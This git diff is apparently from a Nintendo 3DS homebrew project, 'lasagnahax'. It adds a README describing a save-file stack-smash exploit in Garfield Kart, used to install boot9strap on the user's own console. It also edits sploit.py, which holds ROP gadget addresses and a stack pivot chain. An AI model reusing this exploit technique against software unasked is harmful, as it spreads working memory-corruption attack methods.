diff --git a/Garfield.sav b/Garfield.sav
deleted file mode 100644
index a04bdac..0000000
Binary files a/Garfield.sav and /dev/null differ
diff --git a/README.md b/README.md
index b51cb28..132c36b 100644
--- a/README.md
+++ b/README.md
@@ -1 +1,19 @@
-# lasagnahax
\ No newline at end of file
+# lasagnahax
+- Secondary userland exploit for Garfield Kart EU and US
+
+# Thanks
+- Tuxsh for mentioning the exploitability of this title on discord.
+- Tuxsh [Universal Otherapp](https://github.com/TuxSH/universal-otherapp)
+- Yellows8 [3ds_ropkit](https://github.com/yellows8/3ds_ropkit)
+
+# Directions
+0) These directions are intended for experienced 3DS homebrew users only. There are more convenient exploits at https://3ds.hacks.guide for the general public.
+1) Copy the Garfield.sav release file and overwrite your current save file of the same name. Checkpoint and JKSV can do this. This will erase your save data.
+2) Set up [SafeB9SInstaller](https://github.com/d0k3/SafeB9SInstaller/releases) to your SD card. The SafeB9SInstaller.bin file needs to be on the SD root.
+3) Make a boot9strap folder and put [boot9strap.firm](https://github.com/SciresM/boot9strap/releases/tag/1.3) and boot9strap.firm.sha inside of it.
+4) Boot the game and a. tap the lower left icon b. tap garfield's head (not the X beside his head) c. tap the gear icon. This should load universal-otherapp and then safeB9SInstaller.
+5) Proceed with installing boot9strap. You know what to do next since you're the experienced user noted in step 0.
+
+# Exploit
+
+Stack smash via long profile name string in savegame.
\ No newline at end of file
diff --git a/sploit.py b/sploit.py
index ac0785a..af6a7ef 100644
--- a/sploit.py
+++ b/sploit.py
@@ -8,7 +8,7 @@
 POPPC=0x00114aec
 POP_R0PC=0x0015be1c
 POP_R1PC=0x00151650
-POP_R0R4PC=0x0010974c #: pop {r0, r1, r2, r3, r4, pc}
+POP_R0R4PC=0x0010974c
 ROP_STR_R0TOR1=0x0013b098
 FILE=0x00230800
 
@@ -23,26 +23,11 @@
 OPEN=0x001521f8+4
 READ=0x0011df78+4
 
-SP=0x0ffffcb8 # address of ropkit in bss
-#SP=ARCH-6
+SP=0x0ffffcb8 # address of initial rop on stack
 PC=POPPC
 
-READOP_FIX=0x00121c88
-TERM_FIX=0x0015b480
-#0x0015b480 : mov r0, #0 ; str r0, [r4] ; pop {r4, pc} ;
-#0x00121c88 : mov r1, #1 ; str r1, [r0] ; bx lr
-#0x00132d10 : mov r0, lr ; pop {r4, r5, r6, r7, r8, sb, sl, pc}
-#0x001469e0 : str lr, [r0, #0xc] ; pop {pc} "in deep development on a number of key projects"
-#0x0015e8a0 : str lr, [r0, #4] ; nop ; pop {r4, pc}
-#0x001007bc : ldmdb r6, {r0, r2, r5, r6, ip, sp, lr, pc}
-
-
-'''
-with open("payload.bin","rb") as f:
-    ropkit=f.read()
-with open("otherapp.bin","rb") as f:
-    otherapp=f.read()
-'''
+READOP_FIX=0x00121c88 # : mov r1, #1 ; str r1, [r0] ; bx lr
+TERM_FIX=0x0015b480 # : mov r0, #0 ; str r0, [r4] ; pop {r4, pc} ;
 
 def write32(gadget_addr, file_offset):
 	global filename
@@ -111,23 +96,4 @@ def rop(gadget_addr):
 rop( DEST+0x2e0)
 rop(POP_R1PC)
 rop( POPPC)
-rop(STACK_PIVOT)
-'''
-rop(POP_R0PC)
-rop( FILENAME-4)
-rop(POP_R1PC)
-rop( POPPC)
-rop(STACK_PIVOT)
-'''
-
-
-
-
-'''
-write32(LEVEL_ADDR, 0x1CC, "0a")
-
-write32(JUMP_ADDR, 0x1720, "0")
-write32(STACK_PIVOT, 0x171C, "0")
-write32(SP, 0x1738, "0")
-write32(PC, 0x1740, "0")
-'''
+rop(STACK_PIVOT)
\ No newline at end of file